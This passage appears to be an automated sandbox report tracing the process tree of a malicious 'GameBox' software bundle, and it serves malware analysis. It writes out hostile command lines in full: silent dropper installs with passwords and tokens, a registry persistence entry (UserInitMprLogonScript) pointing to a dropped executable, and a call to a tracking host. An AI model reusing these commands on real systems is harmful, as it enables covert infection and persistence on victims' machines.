                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:3428
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 300
                                                                          6⤵
                                                                          • Program crash
                                                                          PID:5208
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:3176
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-6O1T9.tmp\Inlog.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-6O1T9.tmp\Inlog.tmp" /SL5="$2026E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:5076
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-SN236.tmp\Setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-SN236.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                            7⤵
                                                                              PID:6636
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-OLPTB.tmp\Setup.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-OLPTB.tmp\Setup.tmp" /SL5="$60578,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-SN236.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                8⤵
                                                                                  PID:6152
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-BOL4S.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                    9⤵
                                                                                      PID:2584
                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-BOL4S.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                        10⤵
                                                                                        • Drops file in Windows directory
                                                                                        PID:5536
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                      9⤵
                                                                                        PID:4532
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                          10⤵
                                                                                            PID:5216
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-BOL4S.tmp\{app}\vdi_compiler.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-BOL4S.tmp\{app}\vdi_compiler"
                                                                                          9⤵
                                                                                            PID:5336
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 296
                                                                                              10⤵
                                                                                              • Executes dropped EXE
                                                                                              • Program crash
                                                                                              • Checks processor information in registry
                                                                                              • Enumerates system info in registry
                                                                                              PID:828
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                            9⤵
                                                                                            • Checks processor information in registry
                                                                                            • Enumerates system info in registry
                                                                                            PID:5464
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
                                                                                              10⤵
                                                                                              • Adds Run key to start application
                                                                                              • Enumerates system info in registry
                                                                                              PID:5828
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa08c746f8,0x7ffa08c74708,0x7ffa08c74718
                                                                                                11⤵
                                                                                                • Checks processor information in registry
                                                                                                • Enumerates system info in registry
                                                                                                PID:3736
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
                                                                                                11⤵
                                                                                                  PID:4028
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                                                                                                  11⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in Program Files directory
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:6152
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
                                                                                                  11⤵
                                                                                                    PID:5488
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
                                                                                                    11⤵
                                                                                                      PID:1996
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
                                                                                                      11⤵
                                                                                                        PID:6968
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
                                                                                                        11⤵
                                                                                                          PID:5420
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1
                                                                                                          11⤵
                                                                                                            PID:6984
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
                                                                                                            11⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:5400
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3512 /prefetch:8
                                                                                                            11⤵
                                                                                                              PID:8
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
                                                                                                              11⤵
                                                                                                                PID:2188
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
                                                                                                                11⤵
                                                                                                                  PID:6020
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
                                                                                                                  11⤵
                                                                                                                    PID:3060
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6252 /prefetch:8
                                                                                                                    11⤵
                                                                                                                      PID:5480
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6252 /prefetch:8
                                                                                                                      11⤵
                                                                                                                        PID:1952
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
                                                                                                                        11⤵
                                                                                                                          PID:5192
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6688 /prefetch:2
                                                                                                                          11⤵
                                                                                                                            PID:2236
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
                                                                                                                            11⤵
                                                                                                                              PID:4112
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1872 /prefetch:1
                                                                                                                              11⤵
                                                                                                                                PID:4428
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
                                                                                                                                11⤵
                                                                                                                                  PID:5192
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
                                                                                                                                  11⤵
                                                                                                                                    PID:1904
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3976 /prefetch:8
                                                                                                                                    11⤵
                                                                                                                                      PID:1324
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
                                                                                                                                      11⤵
                                                                                                                                        PID:6436
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
                                                                                                                                        11⤵
                                                                                                                                          PID:1336
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:1
                                                                                                                                          11⤵
                                                                                                                                            PID:3780
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1528 /prefetch:1
                                                                                                                                            11⤵
                                                                                                                                              PID:2276
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=596 /prefetch:1
                                                                                                                                              11⤵
                                                                                                                                                PID:3552
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
                                                                                                                                                11⤵
                                                                                                                                                  PID:6736
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
                                                                                                                                                  11⤵
                                                                                                                                                    PID:4388
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1
                                                                                                                                                    11⤵
                                                                                                                                                      PID:2244
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
                                                                                                                                                      11⤵
                                                                                                                                                        PID:4804
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
                                                                                                                                                        11⤵
                                                                                                                                                          PID:7104
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
                                                                                                                                                          11⤵
                                                                                                                                                            PID:4644
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
                                                                                                                                                            11⤵
                                                                                                                                                              PID:6200
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                                                                                                                                                              11⤵
                                                                                                                                                                PID:2888
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5508 /prefetch:8
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:5008
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:6908
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:6572
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1916 /prefetch:1
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:2420
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:3776
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10215770347477392280,4564804209858298159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:1
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:3140
                                                                                                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:5324
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                PID:4512
                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319901 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5560
                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  PID:3912
                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2012
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-G05NV.tmp\VPN.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-G05NV.tmp\VPN.tmp" /SL5="$600B2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:2716
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-965EK.tmp\Setup.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-965EK.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:7036
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2E93V.tmp\Setup.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2E93V.tmp\Setup.tmp" /SL5="$104FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-965EK.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          • Modifies system certificate store
